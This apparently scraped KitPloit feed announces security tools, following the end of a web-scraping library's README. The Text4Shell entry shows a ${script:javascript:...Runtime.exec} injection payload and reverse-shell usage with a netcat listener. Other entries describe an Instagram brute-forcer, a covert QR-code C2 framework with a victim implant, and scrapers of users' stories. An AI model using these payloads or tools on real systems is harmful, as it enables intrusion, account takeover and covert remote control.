  • You already know about the regex matching and the fast json parsing but did you know that all strings returned from the regex search are actually TextHandler objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
  • Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler that's read-only so it's faster and string values returned are actually TextHandler objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and can do partial searches. It might be handy in some cases (returns a generator of matches) python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
  • Serialize the current attributes to JSON bytes: python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
  • Converting it to a normal dictionary python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚑ Enlightening Questions and FAQs

This section addresses common questions about Scrapling, please read this section before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, the unique properties of the first element from the selection results are the only ones that get saved. So if the selector you are using selects different elements on the page that are in different locations, auto-matching will probably return to you the first element only when you relocate it later. This doesn't include combined CSS selectors (Using commas to combine more than one selector for example) as these selectors get separated and each selector gets executed alone.

Designed & crafted with ❀️ by Karim Shoair.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown β€” April 23rd 2025 at 12:30


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a lsitener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Instagram-Brute-Force-2024 - Instagram Brute Force 2024 Compatible With Python 3.13 / X64 Bit / Only Chrome Browser

By: Unknown β€” April 13th 2025 at 12:30


Instagram Brute Force CPU/GPU Supported 2024

(Use option 2 while running the script.)

(Option 1 is on development)

(Chrome should be downloaded in device.)

Compatible and Tested (GUI Supported Operating Systems Only)

Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher


Install Requirements

pip install -r requirements.txt

How to run

python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161


☐ β˜† βœ‡ KitPloit - PenTest Tools!

QuickResponseC2 - A Command & Control Server That Leverages QR Codes To Send Commands And Receive Results From Remote Systems

By: Unknown β€” April 12th 2025 at 12:30



QuickResponseC2 is a stealthy Command and Control (C2) framework that enables indirect and covert communication between the attacker and victim machines via an intermediate HTTP/S server. All network activity is limited to uploading and downloading images, making it an fully undetectable by IPS/IDS Systems and an ideal tool for security research and penetration testing.


Capabilities:

  • Command Execution via QR Codes:
    Users can send custom commands to the victim machine, encoded as QR codes.
    Victims scan the QR code, which triggers the execution of the command on their system.
    The command can be anything from simple queries to complex operations based on the test scenario.

  • Result Retrieval:
    Results of the executed command are returned from the victim system and encoded into a QR code.
    The server decodes the result and provides feedback to the attacker for further analysis or follow-up actions.

  • Built-in HTTP Server:
    The tool includes a lightweight HTTP server that facilitates the victim machine's retrieval of command QR codes.
    Results are sent back to the server as QR code images, and they are automatically saved with unique filenames for easy management.
    The attacker's machine handles multiple requests, with HTTP logs organized and saved separately.

  • Stealthy Communication:
    QuickResponseC2 operates under the radar, with minimal traces, providing a covert way to interact with the victim machine without alerting security defenses.
    Ideal for security assessments or testing command-and-control methodologies without being detected.

  • File Handling:
    The tool automatically saves all QR codes (command and result) to the server_files directory, using sequential filenames like command0.png, command1.png, etc.
    Decoding and processing of result files are handled seamlessly.

  • User-Friendly Interface:
    The tool is operated via a simple command-line interface, allowing users to set up a C2 server, send commands, and receive results with ease.
    No additional complex configurations or dependencies are needed.

Usage

  1. First, install the Dependencies - pip3 install -r requirements.txt
  2. Then, run the main.py python3 main.py
  3. Choose between the options:

1 - Run the C2 Server

2 - Build the Victim Implant

  1. Enjoy!

Demonstration

https://github.com/user-attachments/assets/382e9350-d650-44e5-b8ef-b43ec90b315d

Workflow Overview

1. Initialization of the C2 Server

  • The attacker launches QuickResponseC2, which creates a lightweight HTTP server (default port: 8080).
  • This server serves as the intermediary between the attacker and victim, eliminating any direct connection between them.

2. Command Delivery via QR Codes

  • The attacker encodes a command into a QR code and saves it as commandX.png on the HTTP server.
  • The victim machine periodically polls the server (e.g., every 1 second) to check for the presence of a new command file.

3. Victim Command Execution

  • Once the victim detects a new QR code file (commandX.png), it downloads and decodes the image to retrieve the command.
  • The decoded command is executed on the victim's system.

4. Result Encoding and Uploading

  • The victim encodes the output of the executed command into a QR code and saves it locally as resultX.png.
  • The result file is then uploaded to the HTTP server.

5. Result Retrieval by the Attacker

  • The attacker periodically checks the server for new result files (resultX.png).
  • Once found, the result file is downloaded and decoded to retrieve the output of the executed command.

TODO & Contribution

  • [x] Generate a Template for the Implant
  • [ ] Compile the implant as an .exe automatically
  • [x] Save the generated QR Code as bytes in a variable instead of a file - VICTIM Side
  • [ ] Add an obfuscation on the commands decoded from the QR Codes automatically

Feel free to fork and contribute! Pull requests are welcome.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Telegram-Scraper - A Powerful Python Script That Allows You To Scrape Messages And Media From Telegram Channels Using The Telethon Library

By: Unknown β€” April 11th 2025 at 12:30


A powerful Python script that allows you to scrape messages and media from Telegram channels using the Telethon library. Features include real-time continuous scraping, media downloading, and data export capabilities.

___________________  _________
\__ ___/ _____/ / _____/
| | / \ ___ \_____ \
| | \ \_\ \/ \
|____| \______ /_______ /
\/ \/

Features πŸš€

  • Scrape messages from multiple Telegram channels
  • Download media files (photos, documents)
  • Real-time continuous scraping
  • Export data to JSON and CSV formats
  • SQLite database storage
  • Resume capability (saves progress)
  • Media reprocessing for failed downloads
  • Progress tracking
  • Interactive menu interface

Prerequisites πŸ“‹

Before running the script, you'll need:

  • Python 3.7 or higher
  • Telegram account
  • API credentials from Telegram

Required Python packages

pip install -r requirements.txt

Contents of requirements.txt:

telethon
aiohttp
asyncio

Getting Telegram API Credentials πŸ”‘

  1. Visit https://my.telegram.org/auth
  2. Log in with your phone number
  3. Click on "API development tools"
  4. Fill in the form:
  5. App title: Your app name
  6. Short name: Your app short name
  7. Platform: Can be left as "Desktop"
  8. Description: Brief description of your app
  9. Click "Create application"
  10. You'll receive:
  11. api_id: A number
  12. api_hash: A string of letters and numbers

Keep these credentials safe, you'll need them to run the script!

Setup and Running πŸ”§

  1. Clone the repository:
git clone https://github.com/unnohwn/telegram-scraper.git
cd telegram-scraper
  1. Install requirements:
pip install -r requirements.txt
  1. Run the script:
python telegram-scraper.py
  1. On first run, you'll be prompted to enter:
  2. Your API ID
  3. Your API Hash
  4. Your phone number (with country code)
  5. Your phone number (with country code) or bot, but use the phone number option when prompted second time.
  6. Verification code (sent to your Telegram)

Initial Scraping Behavior πŸ•’

When scraping a channel for the first time, please note:

  • The script will attempt to retrieve the entire channel history, starting from the oldest messages
  • Initial scraping can take several minutes or even hours, depending on:
  • The total number of messages in the channel
  • Whether media downloading is enabled
  • The size and number of media files
  • Your internet connection speed
  • Telegram's rate limiting
  • The script uses pagination and maintains state, so if interrupted, it can resume from where it left off
  • Progress percentage is displayed in real-time to track the scraping status
  • Messages are stored in the database as they are scraped, so you can start analyzing available data even before the scraping is complete

Usage πŸ“

The script provides an interactive menu with the following options:

  • [A] Add new channel
  • Enter the channel ID or channelname
  • [R] Remove channel
  • Remove a channel from scraping list
  • [S] Scrape all channels
  • One-time scraping of all configured channels
  • [M] Toggle media scraping
  • Enable/disable downloading of media files
  • [C] Continuous scraping
  • Real-time monitoring of channels for new messages
  • [E] Export data
  • Export to JSON and CSV formats
  • [V] View saved channels
  • List all saved channels
  • [L] List account channels
  • List all channels with ID:s for account
  • [Q] Quit

Channel IDs πŸ“’

You can use either: - Channel username (e.g., channelname) - Channel ID (e.g., -1001234567890)

Data Storage πŸ’Ύ

Database Structure

Data is stored in SQLite databases, one per channel: - Location: ./channelname/channelname.db - Table: messages - id: Primary key - message_id: Telegram message ID - date: Message timestamp - sender_id: Sender's Telegram ID - first_name: Sender's first name - last_name: Sender's last name - username: Sender's username - message: Message text - media_type: Type of media (if any) - media_path: Local path to downloaded media - reply_to: ID of replied message (if any)

Media Storage πŸ“

Media files are stored in: - Location: ./channelname/media/ - Files are named using message ID or original filename

Exported Data πŸ“Š

Data can be exported in two formats: 1. CSV: ./channelname/channelname.csv - Human-readable spreadsheet format - Easy to import into Excel/Google Sheets

  1. JSON: ./channelname/channelname.json
  2. Structured data format
  3. Ideal for programmatic processing

Features in Detail πŸ”

Continuous Scraping

The continuous scraping feature ([C] option) allows you to: - Monitor channels in real-time - Automatically download new messages - Download media as it's posted - Run indefinitely until interrupted (Ctrl+C) - Maintains state between runs

Media Handling

The script can download: - Photos - Documents - Other media types supported by Telegram - Automatically retries failed downloads - Skips existing files to avoid duplicates

Error Handling πŸ› οΈ

The script includes: - Automatic retry mechanism for failed media downloads - State preservation in case of interruption - Flood control compliance - Error logging for failed operations

Limitations ⚠️

  • Respects Telegram's rate limits
  • Can only access public channels or channels you're a member of
  • Media download size limits apply as per Telegram's restrictions

Contributing 🀝

Contributions are welcome! Please feel free to submit a Pull Request.

License πŸ“„

This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer βš–οΈ

This tool is for educational purposes only. Make sure to: - Respect Telegram's Terms of Service - Obtain necessary permissions before scraping - Use responsibly and ethically - Comply with data protection regulations



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Lobo GuarΓ‘ - Cyber Threat Intelligence Platform

By: Unknown β€” April 9th 2025 at 12:30


Lobo GuarΓ‘ is a platform aimed at cybersecurity professionals, with various features focused on Cyber Threat Intelligence (CTI). It offers tools that make it easier to identify threats, monitor data leaks, analyze suspicious domains and URLs, and much more.


Features

1. SSL Certificate Search

Allows identifying domains and subdomains that may pose a threat to organizations. SSL certificates issued by trusted authorities are indexed in real-time, and users can search using keywords of 4 or more characters.

Note: The current database contains certificates issued from September 5, 2024.

2. SSL Certificate Discovery

Allows the insertion of keywords for monitoring. When a certificate is issued and the common name contains the keyword (minimum of 5 characters), it will be displayed to the user.

3. Tracking Link

Generates a link to capture device information from attackers. Useful when the security professional can contact the attacker in some way.

4. Domain Scan

Performs a scan on a domain, displaying whois information and subdomains associated with that domain.

5. Web Path Scan

Allows performing a scan on a URL to identify URIs (web paths) related to that URL.

6. URL Scan

Performs a scan on a URL, generating a screenshot and a mirror of the page. The result can be made public to assist in taking down malicious websites.

7. URL Monitoring

Monitors a URL with no active application until it returns an HTTP 200 code. At that moment, it automatically initiates a URL scan, providing evidence for actions against malicious sites.

8. Data Leak

  • Data Leak Alerts: Monitors and presents almost real-time data leaks posted in hacker forums and websites.
  • URL+User+Password: Allows searching by URL, username, or password, helping identify leaked data from clients or employees.

9. Threat Intelligence Feeds

Centralizes intelligence news from various channels, keeping users updated on the latest threats.

Installation

The application installation has been approved on Ubuntu 24.04 Server and Red Hat 9.4 distributions, the links for which are below:

Lobo GuarΓ‘ Implementation on Ubuntu 24.04

Lobo GuarΓ‘ Implementation on Red Hat 9.4

There is a Dockerfile and a docker-compose version of Lobo GuarΓ‘ too. Just clone the repo and do:

docker compose up

Then, go to your web browser at localhost:7405.

Dependencies

Before proceeding with the installation, ensure the following dependencies are installed:

  • PostgreSQL
  • Python 3.12
  • ChromeDriver and Google Chrome (version 129.0.6668.89)
  • FFUF (version 2.0.0)
  • Subfinder (version 2.6.6)

Installation Instructions

  1. Clone the repository:
git clone https://github.com/olivsec/loboguara.git
  1. Enter the project directory:
cd loboguara/
  1. Edit the configuration file:
nano server/app/config.py

Fill in the required parameters in the config.py file:

class Config:
SECRET_KEY = 'YOUR_SECRET_KEY_HERE'
SQLALCHEMY_DATABASE_URI = 'postgresql://guarauser:YOUR_PASSWORD_HERE@localhost/guaradb?sslmode=disable'
SQLALCHEMY_TRACK_MODIFICATIONS = False

MAIL_SERVER = 'smtp.example.com'
MAIL_PORT = 587
MAIL_USE_TLS = True
MAIL_USERNAME = 'no-reply@example.com'
MAIL_PASSWORD = 'YOUR_SMTP_PASSWORD_HERE'
MAIL_DEFAULT_SENDER = 'no-reply@example.com'

ALLOWED_DOMAINS = ['yourdomain1.my.id', 'yourdomain2.com', 'yourdomain3.net']

API_ACCESS_TOKEN = 'YOUR_LOBOGUARA_API_TOKEN_HERE'
API_URL = 'https://loboguara.olivsec.com.br/api'

CHROME_DRIVER_PATH = '/opt/loboguara/bin/chromedriver'
GOOGLE_CHROME_PATH = '/opt/loboguara/bin/google-chrome'
FFUF_PATH = '/opt/loboguara/bin/ffuf'
SUBFINDER_PATH = '/opt/loboguara/bin/subfinder'

LOG_LEVEL = 'ERROR'
LOG_FILE = '/opt/loboguara/logs/loboguara.log'
  1. Make the installation script executable and run it:
sudo chmod +x ./install.sh
sudo ./install.sh
  1. Start the service after installation:
sudo -u loboguara /opt/loboguara/start.sh

Access the URL below to register the Lobo GuarΓ‘ Super Admin

http://your_address:7405/admin

Online Platform

Access the Lobo GuarΓ‘ platform online: https://loboguara.olivsec.com.br/



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Telegram-Story-Scraper - A Python Script That Allows You To Automatically Scrape And Download Stories From Your Telegram Friends

By: Unknown β€” April 8th 2025 at 12:30


A Python script that allows you to automatically scrape and download stories from your Telegram friends using the Telethon library. The script continuously monitors and saves both photos and videos from stories, along with their metadata.


Important Note About Story Access ⚠️

Due to Telegram API restrictions, this script can only access stories from: - Users you have added to your friend list - Users whose privacy settings allow you to view their stories

This is a limitation of Telegram's API and cannot be bypassed.

Features πŸš€

  • Automatically scrapes all available stories from your Telegram friends
  • Downloads both photos and videos from stories
  • Stores metadata in SQLite database
  • Exports data to Excel spreadsheet
  • Real-time monitoring with customizable intervals
  • Timestamp is set to (UTC+2)
  • Maintains record of previously downloaded stories
  • Resume capability
  • Automatic retry mechanism

Prerequisites πŸ“‹

Before running the script, you'll need:

  • Python 3.7 or higher
  • Telegram account
  • API credentials from Telegram
  • Friends on Telegram whose stories you want to track

Required Python packages

pip install -r requirements.txt

Contents of requirements.txt:

telethon
openpyxl
schedule

Getting Telegram API Credentials πŸ”‘

  1. Visit https://my.telegram.org/auth
  2. Log in with your phone number
  3. Click on "API development tools"
  4. Fill in the form:
  5. App title: Your app name
  6. Short name: Your app short name
  7. Platform: Can be left as "Desktop"
  8. Description: Brief description of your app
  9. Click "Create application"
  10. You'll receive:
  11. api_id: A number
  12. api_hash: A string of letters and numbers

Keep these credentials safe, you'll need them to run the script!

Setup and Running πŸ”§

  1. Clone the repository:
git clone https://github.com/unnohwn/telegram-story-scraper.git
cd telegram-story-scraper
  1. Install requirements:
pip install -r requirements.txt
  1. Run the script:
python TGSS.py
  1. On first run, you'll be prompted to enter:
  2. Your API ID
  3. Your API Hash
  4. Your phone number (with country code)
  5. Verification code (sent to your Telegram)
  6. Checking interval in seconds (default is 60)

How It Works πŸ”„

The script: 1. Connects to your Telegram account 2. Periodically checks for new stories from your friends 3. Downloads any new stories (photos/videos) 4. Stores metadata in a SQLite database 5. Exports information to an Excel file 6. Runs continuously until interrupted (Ctrl+C)

Data Storage πŸ’Ύ

Database Structure (stories.db)

SQLite database containing: - user_id: Telegram user ID of the story creator - story_id: Unique story identifier - timestamp: When the story was posted (UTC+2) - filename: Local filename of the downloaded media

CSV and Excel Export (stories_export.csv/xlsx)

Export file containing the same information as the database, useful for: - Easy viewing of story metadata - Filtering and sorting - Data analysis - Sharing data with others

Media Storage πŸ“

  • Photos are saved as: {user_id}_{story_id}.jpg
  • Videos are saved with their original extension: {user_id}_{story_id}.{extension}
  • All media files are saved in the script's directory

Features in Detail πŸ”

Continuous Monitoring

  • Customizable checking interval (default: 60 seconds)
  • Runs continuously until manually stopped
  • Maintains state between runs
  • Avoids duplicate downloads

Media Handling

  • Supports both photos and videos
  • Automatically detects media type
  • Preserves original quality
  • Generates unique filenames

Error Handling πŸ› οΈ

The script includes: - Automatic retry mechanism for failed downloads - Error logging for failed operations - Connection error handling - State preservation in case of interruption

Limitations ⚠️

  • Subject to Telegram's rate limits
  • Stories must be currently active (not expired)
  • Media download size limits apply as per Telegram's restrictions

Contributing 🀝

Contributions are welcome! Please feel free to submit a Pull Request.

License πŸ“„

This project is licensed under the MIT License - see the LICENSE file for details.

Disclaimer βš–οΈ

This tool is for educational purposes only. Make sure to: - Respect Telegram's Terms of Service - Obtain necessary permissions before scraping - Use responsibly and ethically - Comply with data protection regulations - Respect user privacy



☐ β˜† βœ‡ KitPloit - PenTest Tools!

gitGRAB - This Tool Is Designed To Interact With The GitHub API And Retrieve Specific User Details, Repository Information, And Commit Emails For A Given User

By: Unknown β€” April 7th 2025 at 12:30


This tool is designed to interact with the GitHub API and retrieve specific user details, repository information, and commit emails for a given user.


Install Requests

pip install requests

Execute the program

python3 gitgrab.py



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Snoop - OSINT Tool For Research Social Media Accounts By Username

By: Unknown β€” April 6th 2025 at 12:30


OSINT Tool for research social media accounts by username


Install Requests

```Install Requests pip install requests

#### Install BeautifulSoup
```Install BeautifulSoup
pip install beautifulsoup4

Execute the program

Execute Snoop python3 snoop.py



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests

By: Unknown β€” September 19th 2024 at 11:30


Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities.


Disclaimer

This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk.

Features

  • Enables the addition of custom headers within requests
  • Offers customization of various HTTP methods for both origin and target requests
  • Supports rate-limiting to manage request thresholds effectively
  • Provides the option to specify "ignored parameters" which the tool will ignore during execution
  • Improved the support in nested arrays/objects inside JSON data in responses

What's Next

  • Support additional content types, such as "application/x-www-form-urlencoded"

Installation & Usage

Install requirements

pip3 install -r requirements.txt

Run the script

python3 mass_assigner.py --fetch-from "http://example.com/path-to-fetch-data" --target-req "http://example.com/path-to-probe-the-data"

Arguments

Forbidden Buster accepts the following arguments:

  -h, --help            show this help message and exit
--fetch-from FETCH_FROM
URL to fetch data from
--target-req TARGET_REQ
URL to send modified data to
-H HEADER, --header HEADER
Add a custom header. Format: 'Key: Value'
-p PROXY, --proxy PROXY
Use Proxy, Usage i.e: http://127.0.0.1:8080.
-d DATA, --data DATA Add data to the request body. JSON is supported with escaping.
--rate-limit RATE_LIMIT
Number of requests per second
--source-method SOURCE_METHOD
HTTP method for the initial request. Default is GET.
--target-method TARGET_METHOD
HTTP method for the modified request. Default is PUT.
--ignore-params IGNORE_PARAMS
Parameters to ignore during modification, separated by comma.

Example Usage:

python3 mass_assigner.py --fetch-from "http://example.com/api/v1/me" --target-req "http://example.com/api/v1/me" --header "Authorization: Bearer XXX" --proxy "http://proxy.example.com" --data '{\"param1\": \"test\", \"param2\":true}'



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Hfinger - Fingerprinting HTTP Requests

By: Unknown β€” June 24th 2024 at 12:30


Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)

Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.

Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share fingerprint.

An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.


    The idea

    The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.

    After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include: * Request method * Protocol version * Header order * Popular headers' values * Payload length, entropy, and presence of non-ASCII characters

    Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in details here.

    The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.

    Installation

    Minimum requirements needed before installation: * Python >= 3.3, * Tshark >= 2.2.0.

    Installation available from PyPI:

    pip install hfinger

    Hfinger has been tested on Xubuntu 22.04 LTS with tshark package in version 3.6.2, but should work with older versions like 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.

    Please note that as with any PoC, you should run Hfinger in a separated environment, at least with Python virtual environment. Its setup is not covered here, but you can try this tutorial.

    Usage

    After installation, you can call the tool directly from a command line with hfinger or as a Python module with python -m hfinger.

    For example:

    foo@bar:~$ hfinger -f /tmp/test.pcap
    [{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]

    Help can be displayed with short -h or long --help switches:

    usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
    [-l LOGFILE]

    Hfinger - fingerprinting malware HTTP requests stored in pcap files

    optional arguments:
    -h, --help show this help message and exit
    -f FILE, --file FILE Read a single pcap file
    -d DIR, --directory DIR
    Read pcap files from the directory DIR
    -o output_path, --output-path output_path
    Path to the output directory
    -m {0,1,2,3,4}, --mode {0,1,2,3,4}
    Fingerprint report mode.
    0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
    1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
    2 - optimal (the default mode),
    3 - the lowest number of generated fingerprints, but the highest number of collisions,
    4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
    -v, --verbose Report information about non-standard values in the request
    (e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
    Without --logfile (-l) will print to the standard error.
    -l LOGFILE, --logfile LOGFILE
    Output logfile in the verbose mode. Implies -v or --verbose switch.

    You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:

    hfinger -f example.pcap -o /tmp/pcap

    will be saved to:

    /tmp/pcap/example.pcap.json

    Report mode -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ on represented request features or rounding modes. The default mode (2) was chosen by us to represent all features that are usually used during requests' analysis, but it also offers low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.

    Beginning with version 0.2.1 Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using -l/--log switch (it implies -v/--verbose). The log data will be appended to the log file.

    Using hfinger in a Python application

    Beginning with version 0.2.0, Hfinger supports importing to other Python applications. To use it in your app simply import hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and reporting mode. The returned result is a list of dicts with fingerprinting results.

    For example:

    from hfinger.analysis import hfinger_analyze

    pcap_path = "SPECIFY_PCAP_PATH_HERE"
    reporting_mode = 4
    print(hfinger_analyze(pcap_path, reporting_mode))

    Beginning with version 0.2.1 Hfinger uses logging module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using name hfinger, but without prior configuration log information in practice is discarded. If you want to receive this log information, before calling hfinger_analyze, you should configure hfinger logger, set log level to logging.INFO, configure log handler up to your needs, add it to the logger. More information is available in the hfinger_analyze function docstring.

    Fingerprint creation

    A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.

